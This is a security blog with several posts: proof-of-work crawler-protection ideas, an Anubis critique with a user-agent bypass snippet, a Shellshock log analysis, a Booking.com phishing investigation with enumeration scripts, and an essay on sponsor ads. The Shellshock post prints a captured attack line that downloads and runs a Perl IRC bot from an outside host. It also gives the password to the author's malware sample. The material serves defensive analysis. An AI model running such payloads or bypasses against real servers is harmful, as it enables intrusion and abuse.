
Ideas for Proof of Work crawler protection

A little while ago I wrote a post about Anubis in which I called it kinda crap but fine. Of course my brain didn't shut off after that so, uh, here are some thoughts on how one could solve some of the issues of the proof-of-work approach Anubis uses. I am sure there is prior literature & I am just reinventing the wheel, but I wanna see how far I can get on my own (with the design for now, I can't program for shit...).

In the previous blogpost I highlighted the work imbalance in the approach Anubis uses - provide a proof-of-work solution once, get a cookie, do all the requests you want within a multi-day time period. Or in other words: the required work does not scale with the number of requests. If you intend to keep the site usable for flesh-and-blood users, crawlers don't really pay a high cost either. Unfortunately you can't really limit the number of calls per token either (without going stateful, ew)... so what if we just required constant proofs instead?

Basic design

Let's say a client is requesting $url. To access that resource the client also needs to provide $solution such that $solution != mod($url) and hash($solution)[0:n] == hash(mod($url))[0:n], where n is a measure of difficulty, hash is some hash function, and mod is a modifying function for the URL - what mod needs to do depends on how we solve some issues below.
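A minimal sketch of the idea in Python, with some assumptions on my part: SHA-256 as the hash, a hex-prefix comparison as the difficulty measure, and a do-nothing mod for now:

import hashlib
import itertools

N = 5  # difficulty: number of hex digits of the digest that have to match

def mod(url: str) -> str:
    # placeholder modifier - in the query-parameter variant below this would strip the solution parameter
    return url

def target(url: str) -> str:
    return hashlib.sha256(mod(url).encode()).hexdigest()[:N]

def verify(url: str, solution: str) -> bool:
    # cheap check on the gateway: one hash per request
    return solution != mod(url) and hashlib.sha256(solution.encode()).hexdigest()[:N] == target(url)

def solve(url: str) -> str:
    # expensive search on the client: roughly 16**N hashes on average
    prefix = target(url)
    for counter in itertools.count():
        candidate = f"{mod(url)}#{counter}"
        if hashlib.sha256(candidate.encode()).hexdigest()[:N] == prefix:
            return candidate

Since the puzzle is bound to the URL, the client has to pay this cost for every protected resource it requests - which is the whole point.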

How do we get $solution to the gateway? A cookie might be possible but seems messy, same for the body (oh god, I don't want to think about the packing/unpacking magic required for protecting POSTs...). I see two options: headers and query parameters.

Headers would be kinda neat because they don't require modifying the URL; you are however running into the issue that providing pre-validated links on other websites requires JS. This probably isn't a KO criterion, though it will require some extra engineering for requests with a body coming from other websites.

Adding $solution as a URI query parameter feels a bit messy at first. First, it is user-visible, which... eh. Second, it either requires removal of the parameter in mod or $solution becomes self-referential - this shouldn't technically be an issue but... is kind of a mindfuck. But it has one major benefit: It doesn't require messing with the actual requests per se, you can just link to $url[?/&]solution=$solution directly. It's probably the approach I'd prefer.
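If we go that route, mod basically just strips the parameter again, and pre-validated links can be generated ahead of time. A rough sketch - the parameter name solution and the prevalidated_link helper are made up, solve() is from the sketch above:

from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

def mod(url: str) -> str:
    # strip the solution parameter so the puzzle is defined over the "clean" URL
    parts = urlsplit(url)
    query = [(k, v) for k, v in parse_qsl(parts.query) if k != "solution"]
    return urlunsplit(parts._replace(query=urlencode(query)))

def prevalidated_link(url: str) -> str:
    # build a link that already carries a valid proof, for linking from other sites without JS
    parts = urlsplit(url)
    query = parse_qsl(parts.query) + [("solution", solve(url))]
    return urlunsplit(parts._replace(query=urlencode(query)))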

Restoring Usability

Eh, so, all of that is nice but we just took usability out back and put a bullet through its head, in two different ways - maybe more I haven't found yet: First, loading a site with subresources (idk, js, css, embedded images, ...) isn't gonna work, or is gonna cost a lot of work. Second, you'll get the cute anime Egyptian god popping up & making you wait every time you click a link.

Subresources

We can solve this multiple ways.

First one is kinda lazy: Only require proof-of-work for specific resources, making the proof-of-work implicit. Wanna access something in /assets/? Sure, go ahead. Wanna access something in /posts/? You better do the homework. The idea here is that there are either resources that are not very protection-worthy (e.g. the CSS for a generally available SSG preset) or only accessible through protected resources (e.g. images embedded in or linked to by protected pages). Important note though: This does not provide any protection against crawlers attempting to enumerate directory contents in unprotected directories directly.

The second one follows the same idea but attempts to provide protection against enumeration: Solutions for subresources are pregenerated on the server & already included in the HTML/JS delivered to the client. This... is messy and may completely fall apart if you are using external JS or whatever... Not a fan.

Third option... is kinda my favourite but also infeasible in most cases: If you have a good mapping of which resource is used by which page we could use the Referer header for implicit proof. Sounds like a lot of work and may again allow for certain enumeration-based bypasses.

Honestly, let's just go with the first.
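A sketch of what that first option could look like on the gateway - the path prefixes are made-up examples and verify() is the check from the first sketch:

PROTECTED_PREFIXES = ("/posts/",)  # everything else gets a free pass

def requires_proof(path: str) -> bool:
    return path.startswith(PROTECTED_PREFIXES)

def handle(url: str, path: str, solution: str | None) -> int:
    # returns an HTTP status code
    if not requires_proof(path):
        return 200
    if solution is not None and verify(url, solution):
        return 200
    return 403  # or: serve the challenge page here instead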

Conclusion

I don't think I can implement this. I have no experience with webshit... at all so I am probably overlooking shit. If you find some issues please let me know though, I'd love to learn what I failed to consider!

Anubis & Obscurity

You may have come across Anubis over the last few months - a WAF, of sorts, that uses automated challenges to filter out misbehaving web scrapers.

It's kinda crap. But that's fine & it's also kinda cool!

Why it is required

There are plenty of "bots" out there & they aren't all bad. A Mastodon instance checking verified links on your profile? That's a bot. A social media tool generating previews for a link? That's a bot. The Internet Archive? That's a bot.

Web clients accessing a resource will generally indicate their identity using a User-Agent header. Browser user agents are... weird. What's relevant for us here is that browser user agent strings generally start with Mozilla/5.0. Bot user agents should generally be pretty simple by comparison: botname/version (some additional info). Additionally, bots should follow the robots.txt if it exists, a file hosted at a well-known location on a webserver that tells bots what they may or may not access. This can be pretty granular, including different rules for different bots, request frequency limitations, ...
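For illustration, a made-up robots.txt showing that kind of granularity (Crawl-delay is a de-facto extension, not every bot honours it):

User-agent: *
Crawl-delay: 10
Disallow: /drafts/

User-agent: SomeAnnoyingBot
Disallow: /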

... except all of that is just convention, there is no enforcement. Bots can just ignore the robots.txt. Clients (incl. bots) can just set any user agent they want & many of the more misbehaving bots do - a common choice is to imitate common browsers.

How Anubis attempts to solve this

This is just a high-level description of Anubis; I will skip elements of it if I don't think they are relevant to this discussion. If you want all the details: here are the docs.

Anubis, by default, only attempts to filter out extremely misbehaving bots, those that impersonate (or are!) browsers. For this Anubis checks the User Agent - if it doesn't start with/include Mozilla you get a free pass. This feels quite paradoxical at first as Anubis explicitly doesn't block bots presenting as bots.

After that Anubis issues a challenge, a small piece of JS implementing a mathematical problem that's hard to solve but where a solution is easy to check. Once the client sends a correct response Anubis issues a signed cookie which the client can use to bypass future inspections.
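Not Anubis's actual token format (see their docs for that), but the stateless signed-cookie idea boils down to something like this sketch:

import hashlib
import hmac
import json
import time

SECRET = b"server-side secret"  # never leaves the server

def issue_token(client_info: dict, valid_days: int = 7) -> str:
    # everything lives inside the token itself - no server-side storage needed
    payload = json.dumps({**client_info, "exp": time.time() + valid_days * 86400})
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{sig}"

def check_token(token: str) -> bool:
    payload, _, sig = token.rpartition("|")
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected) and json.loads(payload)["exp"] > time.time()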

That's it.

Why this is kinda crappy

Trivial bypass

Ok, you are a misbehaving bot, pretending to be a browser. You approach the webserver, get told "lol no"... what do you do? Well, just make the request again but this time using any other user agent. Bam, you are in.
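That's the entire "bypass" against a default config - a sketch using the requests library and a made-up target:

import requests  # third-party: pip install requests

url = "https://anubis-protected.example.com/some/page"

# Claiming to be a browser -> you get the challenge page
challenged = requests.get(url, headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"})

# Claiming to be literally anything else -> the default config waves you through
waved_through = requests.get(url, headers={"User-Agent": "totally-not-a-scraper/1.0"})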

Work imbalance

Anubis is (largely) stateless, from what I can tell. This is kinda neat from a lot of perspectives - all information is maintained in the signed token, no database required on the server. But this also means: Tokens are valid for a certain period, not a number of requests.

Why does this matter? Should any bot obtain a valid token they can scrape the entire website without further checks.

This creates an interesting imbalance: Legitimate users (maybe visiting a handful of pages) pay a much higher proof-of-work cost per request than bots, & the larger the site to be scraped the more the per-page cost diminishes.
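Back-of-the-envelope, with made-up numbers: if one challenge costs ~1 second of CPU, a human reading 5 pages pays ~200 ms per page, while a crawler pulling 100,000 pages on the same token pays ~10 µs per page - four orders of magnitude less.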

Oh, and from some very ad-hoc testing the in-browser JS code is pretty unperformant compared to a hacked-together Python script.

But does this matter?

And yet Anubis is fine - it will keep out the dumb & malicious bots at a very low cost. Implementing a challenge solver takes effort. Solving them will add up over time if you are scraping billions of websites. Even implementing an Anubis detection & user agent based bypass takes effort. And if you really want to bring down the hammer you can disable user agent checks. And all that for a few CPU cycles on the server & the user's end - most of the time I don't even notice the Anubis challenge pages anymore. Oh, and maybe breaking the Internet Archive bot...

But Anubis cannot afford to become successful, it must stay a niche application. Should it ever become successful "attackers" will adapt, will exploit those weaknesses... because this is Security by Obscurity. Anubis works by being weird, unexpected, and small. The proof-of-work is secondary. I am not going to go as far as calling it theatre, I don't have the data to prove that. But no motivated attacker will be stopped by it.

Hm, actually, good question, how effective is Anubis compared to a simple "here is a cookie, now do a refresh" JS starting page?...

Obscurity is fine

And again, that is fine. Obscurity can absolutely be part of a defensive strategy, reducing load, reducing noise, keeping out the dumb-as-rocks attackers so you got time & resources to focus on the ones that matter. Be that in security operations or in the number of CPU cycles you got available on your webserver.

Offtopic

Anyway, this was all a very long-winded way of setting up an explanation of why my employer should move away from firstname.lastname@domain.tld for employee email addresses, because jfc, if someone in middle management asks me ONE MORE TIME how spammers know their email address & I need to ask them "do you have LinkedIn"... .

How about firstname.lastname.random3digitnumber@domain.tld?

Who do you think will kill me first? Messaging team or business?

Short: Shellshocked!

Just a short one for now: Tonight I received a maximum severity alert from my SIEM - one of my internet-facing webservers received a shellshock attack! After a quick check for successful exploitation (none that I could see) I went back to sleep.

This is what was attempted (except not defanged, duh):

Timestamp: 2025-06-14T01:23:07+0200
Source IP: 104.131.118.62
Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1
User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)

Or in human: Use the user agent to do the () { :;}; thing, print something in Perl I haven't fully made sense of yet, use system to download a file (three different ways, depending on what downloader is available), execute the file as a Perl script, then clean up behind yourself.

I just want to point out though: I think this is broken in multiple ways?

  • The closing single quote for the perl -e does not include the system call when it presumably should?

  • The curl usage of the -O flag is incorrect here (-O saves under the remote filename, it doesn't take an output path - that would be -o); definitely made that mistake myself though.

I downloaded the file manually, you can find it here. ZIP password is ENqHNXX2JM0w. It presents itself as "DDoS Perl IrcBot v.10 / 2012 by w0rmer Security Team", a "Stealth MultiFunctional IrcBot written in Perl". I hate Perl. Thankfully it has a disclaimer "Created for educational purposes only. I'm not responsible for the illegal use of this program". Good to know!

I'd throw some IOCs on OTX but, like, half of them are whitelisted, not gonna bother for now...

Hotels I won't visit

I recently got my hands on a sample of a phishing campaign. Pretty boring one, fwiw, "just" trying to steal personal + credit card data, but I still felt like doing a bit of digging. Here are some findings.

While I will share domains & URL patterns I will not share full URLs as the associated pages contain personal data (esp. names) of targets. If you need the full URLs feel free to reach out to me.

I will not be able to share the original sample email.

The email

I received my sample email(s) from someone who had recently booked a stay with a specific Austrian Hotel (Hi5-Hotel) through Booking.com. At a later point (2025-06-01) they received a notification from Booking.com about the need to provide additional information, otherwise their stay would be cancelled, with the hotel being named as the sender.

Reviewing the mail itself it looked technically clean, actually coming from a Booking.com subdomain & passing SPF. I will not even include any IOCs for the email itself here as I am rather certain this is, technically, a legitimate email.

The link in the body, however, was highly suspicious: https://hi5XXXX.gstlly.com/ (with XXXX being four random lowercase alphabetic characters). By the time my recipient interacted with that email (2025-06-02) the specific domain had already been flagged as malicious in a security product in use by the recipient, so no damage was done in this case.

Booking.com partner compromises

Booking.com has a problem: It partners with millions of properties. This makes it a certainty that a good number of their partners will have security incidents on a regular basis. While Booking.com's infrastructure is likely not at significant risk from this, their customers are: Enterprising attackers can compromise the Booking.com accounts of partners, steal customer data, and send notifications to customers using legitimate notification channels.

I am rather certain this is also what happened in this case, given we had a technically clean email, knowledge about the hotel this person was staying at & the correct dates.

This unfortunately makes recipient-side filtering rather tricky - not that I think it should be on the recipient, this is on you, Booking.com.

The website

One thing I found initially fascinating is the URL/link provided in the email (https[://]hi5XXXX.gstlly[.]com/): No, there is nothing missing there. The path just is /, no parameters, no nothing. Yet when following the link (in a sandbox) the site prefilled the recipient's data. This means: There are individual domain names for individual targets! I have no idea why, tbh. My first theory was that this allows for identifying delivery or analysis based on DNS queries, even if parameters get stripped?

But that doesn't really make sense given that the entire thing is hosted on Cloudflare anyway, including using CF nameservers. So I don't know, if you got ideas lmk.

Anyway, the site immediately 302-redirects the user to https[://]booking.confirmation-id91753[.]com/YYYYYYYYYY where YYYYYYYYYY is a 10-digit number. This 10-digit number maps to various details of the stay, including property, date, names, price. Interestingly the name is not always pre-filled.

The destination page mimics the style of a Booking.com website reasonably well & is prefilled with the above-mentioned information. The visitor is asked to provide some additional data such as an email & phone number.

Tor Browser Screenshot of the above-described website. In this case the hotel is the Aalesund City Apartment, with the address being given in cyrillic. The name and surname, as well as the ID in the address bar have been blacked out.

Once that information has been provided the website lets you proceed to https[://]booking.confirmation-id91753[.]com/C3REEV2V5/ for credit card harvesting. Here the path is the same for every victim; target information is maintained in a cookie, again using the 10-digit number from above. The visitor is asked to enter credit card information, including cardholder name, card number, expiration date, and CVC. You are even given the option to opt in to marketing emails, nice touch!

Tor Browser Screenshot of the above-described credit card harvesting page. The hotel is still the Aalesund City Apartment. No CC data has been filled in.

After filling in CC information the visitor is forwarded to a holding page & told, both by the site & the support chatbot box, to please wait while the CC data is being checked. The path is again universal to all targets (https[://]booking.confirmation-id91753[.]com/EC1G5P8X9/); victim-specific data is maintained in cookies & in the request itself.

This is where, I assume, the magic happens - the page loads for a few minutes while the backend presumably attempts to conduct some light financial crimes with the given CC information. As I gave it some fake CC data I am unfortunately unable to confirm this but I am only going to put in so much effort into this.

If the CC validation fails the visitor is sent back to the previous page and asked to enter new CC information.

Tor Browser Screenshot of the above-described website. The site shows a box with big VISA & Mastercard logos & the headline "point of sale - booking". Some data is shown below, incl. the current date & the last four digits of the CC number. Below that a spinning loading wheel & the text "Your transaction is being processed. This may take some time." is shown. To the side a "support" text box has popped up, telling the visitor in English that the information has been received & verification is in progress. The visitor is instructed not to leave the page & will be informed once this is done.

Overall a pretty clean website, ngl, pretty believable if you don't look too closely.

If an "ununsed" page is loaded all you get is a "AD not found (captcha2)" page which feels like it could be turned into identifying the underlying stack but appears to be pretty much completely GenAI generated, given the amount of unnecessary comments in the code.

Unfortunately the page, in general, doesn't yield a lot of other information I could find - used resources appear to be hosted exclusively on the same domain, with a minority being loaded from central CF servers. As mentioned above, the default failure page appears to be GenAI-generated. Comments are in Russian. There are also a few other places in the website that point to a Russian-language preference of the creators, incl. some CF links pointing to the ru-ru version of pages. The chatbot, which... isn't really functional most of the time, also has a tendency to default to Russian if unexpected non-language inputs are given.

Other than that the site itself is pretty non-descript to my untrained eye. Doing some searches on code snippets shows that this exact website code & design has been used since at least February 2024 (Urlquery example). That gives me an opportunity to go for the scheduled CF rant though...

Cloudflare

Recently, on a podcast (not sure if Risky Business or Defensive Security), I heard someone describe something as:

Cloudflare, but for criminals

That's redundant. Cloudflare is the Cloudflare for criminals. It has been a week since this page went live & at least 6 days since at least some security products classified this page as malicious. Cloudflare has hosted (and at times taken down) this exact malicious site 5 times over more than a year - and that's just the stuff I, an idiot, can find. At some point you'd think you'd just spot-check the code served for 1-to-1 matches against known-malicious sites, right? Or check on newly created sites as the number of detections on VT climbs?

No? Oh well, at least the captcha stays up so sandboxes & scanners have a worse time, good job CF! At least your product doesn't lock me out from scraping & identifying valid 10-digit IDs & domains, because indicators still leak through!

Languages

So, small fun element: the site allows you to select languages - one that is missing is Ukrainian. Checking the code... the div for Ukrainian is still there! Just... commented out?? I am just going to imagine this as a case in which the compliance team told the devs to take it out because technically those would be customers & "we can't have Ukrainian customers, we are at war with them!". I don't care if that's the truth, it's the funniest option!

Update: Aging out & variants

So, as I am writing this I am noticing some IDs are no longer valid (apparently on a per-hotel basis?) & I found at least one hotel where a different path is followed (immediate collection of credit card information). Not gonna hold this back any longer though...

Scraping

Because I didn't just want to look at a trainwreck but actually do something semi-useful I went ahead & tried to identify impacted hotels. For this I used Hi5 as a starting point & enumerated the entire 4-character subdomain space. This was quite trivial as the HTTP status code immediately yielded success/failure: 444 for a miss, 302 (with a Location header) for a hit.
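Roughly what that boils down to - a naive sequential sketch, assuming requests as the HTTP client (a real run wants concurrency, retries & some politeness):

import itertools
import string
import requests  # third-party: pip install requests

# hi5 + 4 lowercase characters = 26**4 = 456,976 candidate subdomains
for combo in itertools.product(string.ascii_lowercase, repeat=4):
    host = f"hi5{''.join(combo)}.gstlly.com"
    try:
        r = requests.get(f"https://{host}/", timeout=5, allow_redirects=False)
    except requests.RequestException:
        continue
    if r.status_code == 302:  # 444 = miss, 302 + Location header = hit
        print(host, r.headers.get("Location"))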

This gave me 165 10-digit IDs & I noticed that these were quite closely grouped: none below 1720637422, none above 1748504819. This means that the density may be in the realm of doable for some random scraping.

Here, unfortunately, the status code was 200 no matter hit or miss. Fortunately the HTML made hits & misses easy to identify & it was even possible to obtain (noisy) information about the respective property. This was... honestly ideal for me: I don't even get sent personal data on the targets but still get the hotel name. Neat!

Some hideous BeautifulSoup4 code & 500k random IDs from the range later I had 400ish IDs for 70ish properties. This is definitely not all of them but with my terrible code this was already an entire evening. A (noisy, non-clean) list of the properties can be found here.
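The rough shape of that scraper, heavily hedged - the .hotel-name selector is entirely hypothetical, the real hit/miss marker depends on the page's markup:

import random
import requests  # third-party: pip install requests
from bs4 import BeautifulSoup  # third-party: pip install beautifulsoup4

BASE = "https://booking.confirmation-id91753.com/"
LOW, HIGH = 1720637422, 1748504819  # observed ID range

properties = {}
for booking_id in random.sample(range(LOW, HIGH + 1), k=500_000):
    try:
        r = requests.get(f"{BASE}{booking_id}", timeout=10)
    except requests.RequestException:
        continue
    soup = BeautifulSoup(r.text, "html.parser")
    # hypothetical selector standing in for whatever marks a hit on the real page
    name = soup.select_one(".hotel-name")
    if name is not None:
        properties.setdefault(name.get_text(strip=True), []).append(booking_id)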

Reporting

So, let's do something good & actually report this.

Fortunately the site is already on the Safe Browsing & similar shitlists so that's already done.

Cloudflare reports suck as usual but the John Johnson report is out, not that I believe they'll actually do much... As Cloudflare is Cloudflare I can't report all of this at once (only one FQDN per report, great, thanks) so I just sent a report for the final domain, not the gstlly one, & mentioned gstlly in the comments.

Finally, Booking.com. I don't have a particular hate for their IT teams so I feel kinda bad about the reporting path - unfortunately I am unable to submit a report through their webforms as I am neither a customer nor a partner. This feels... kinda bad? While they have a security.txt it only mentions their HackerOne & their appsec email address. This doesn't fall under either but I can't not report it so... yeeeet, it goes to the appsec email, with an explicit apology & explanation.

Let's see what comes from this, I am sure booking.com already knows this one by heart... .

Update: Fuck me I guess?

The email was bounced by Proofpoint because my email server is running on a VPS - fuck an open internet infrastructure, I guess. At every goddamn step in this process, supposed security products have made things worse for me & easier for the bad guys, with the notable exceptions of forward proxies & blocklists. Email filtering failed on the phishing mails, TOC failed when my user clicked the link, Clownflare made scraping unnecessarily difficult without detecting they are hosting known malicious shit & has a shit reporting process, and now we get yet another email security company slowing things down. Yay.

Do you know where your sponsors are?

tl;dr: I believe that Content Creators have a responsibility for all sponsor claims they make & repeat. If they can not do that they must not advertise outside their area of expertise.

Ads & Waffengleichheit

I do not like advertisement. It wastes my time, it wastes customers money, it is annoying, yada yada yada. Not much new here.

But it also is unfair. The person I first heard this idea from (working in customer retention) saw a fundamental issue in the "Waffengleichheit" (German, lit. "equality of arms"): on one side we have professionals drawing on decades to centuries of industry research & the resources of sometimes multi-billion-dollar companies, on the other side some individual just trying to live their life while being under near-constant bombardment by product propaganda.

With this unbelievable asymmetry an individualistic defense is simply not possible. Even if you consider yourself defended against this propaganda (you aren't!), I believe that society has a duty to defend its vulnerable, not accept a status quo in which only the strongest can succeed. As advertisement is not going anywhere anytime soon this means: Controls, limits, and checks are required for advertisement, to at least curb the worst excesses.

Platforms & Content Creators

This includes a moral imperative for advertising platforms to control the 3rd party ads they run. This has been discussed to death for big platforms (advertisement networks, media platforms be it legacy or digital, social media platforms, ...) & I have no hope for actual change here in the current political climate. But you know who else is a platform? Influencers & content creators.

Where is the difference between your favourite YouTube host taking a break from the video's content to talk to you about NordsharkVPN & the NCIS episode being interrupted to show you an ad for... idk what ads run on TV these days, I don't even know if NCIS still exists. There is no difference, it's in-stream advertisement probably unrelated to the topic & paid for with money.

Actually, that's not true. There is a difference:

  • I know the YouTube host reading the lines. I probably value the host's opinion. I may even be watching this very video to obtain factual information. There may even be a smooth transition from the video to the ad, sometimes a funny one.

  • I do not know the TV ad reader. I have no emotional connection to them. There (generally) is a clear break between the TV show & the ad break, not some "You know what else...".

This direct involvement makes content creators powerful as ad platforms. While parasocial relationships are risky & despite my misgivings about advertising in general, this is not necessarily bad: Creators have a tighter relationship with & higher dependence on their consumers than (legacy) media networks; trust is a valuable commodity & incentive. In theory.

But this involvement also makes them responsible.

VPNs & false advertisement

This isn't just about VPNs. You could probably write this exact article about razors, mattresses, earbuds, underwear, data deletion services, meal replacements, ready-made meals, nutritional supplements, ... Oh god, let us not talk about coupon browser extensions.

Sidenote: I am looking forward to future historians dating media records from the current century based on the product category & brand name of the month.

But VPNs are something where I can somewhat claim expertise & as such call the most common versions of these ads misleading to outright false, with the benefits of & need for VPNs being majorly overstated & the associated risks being completely absent. I won't go through that here, it has again been discussed to death. I am also not going to get into the question of whether you should use a VPN. For this post I just care about the false advertisement.

It doesn't really matter where the false claims originate, be it with the product itself, some advertising agency, or the creators themselves. They have been spoken in the creator's voice.

Responsibility & Expertise

To which degree one should hold people & orgs responsible for mistakes is a complicated topic & there is no general answer. I generally believe that blame for individual human errors is mostly a bad idea & such cases should instead be used to identify & eliminate causes.

Sidenote: This has had me in the past clash with management at work about secret management & systemic failures, but that is a future blogpost...

Procedural negligence is not that.

Not checking the truth of the words you speak for someone else for money, as your income stream, is procedural negligence.

In a lot of criticism I read & hear about this there often is a disclaimer along these lines:

And I do not blame creators for whom this is outside their area of expertise, they can not know better.

I disagree. Yes, individual human mistakes may be made more likely by a lack of subject matter expertise. But this doesn't absolve the creator - it shows a heightened level of procedural negligence, in which the creator fails to compensate for their lack of expertise. This is a structural failure.

Could I write a truthful ad for a VPN solution? I think so, yes. It may not make the VPN provider happy. Creators like Tom Scott have been walking an interesting line here, showing this can be done[1].

Could I write a truthful ad for a nutritional supplement? Not without significant research & consulting subject matter experts. This requires time & effort & potentially even incurs monetary cost.

[1]: fwiw, I will hold this against him & other SMEs nevertheless. While these ads themselves do not contain falsehoods they serve to legitimize providers who otherwise use false advertising & whitewash their image.

I am not going to blame a creator that chooses to incur these costs & still fails in the research - individual error, see above - but this should bring them to reconsider whether they should operate outside their area of expertise, especially for topics where good resources on these issues are widely available. The issue of lacking Waffengleichheit applies here, too: Smaller content creator teams may not have the capability to check the information provided to them by a professional team of bullshitters who have been flooding the internet with misinformation for years. This doesn't just apply to consumers.

I am, however, going to blame creators that choose not to incur these costs while taking the money. You are making these your own words. They are your responsibility. You are willingly negligent.

Closing notes

What originally got me thinking about this was Reject Convenience, especially his YouTube videos. They are pretty good, overall, especially as starting points & frameworks for discussing privacy topics with non-experts.

This post was written while listening to MASTER BOOT RECORD - IP. It's ok, probably not gonna relisten.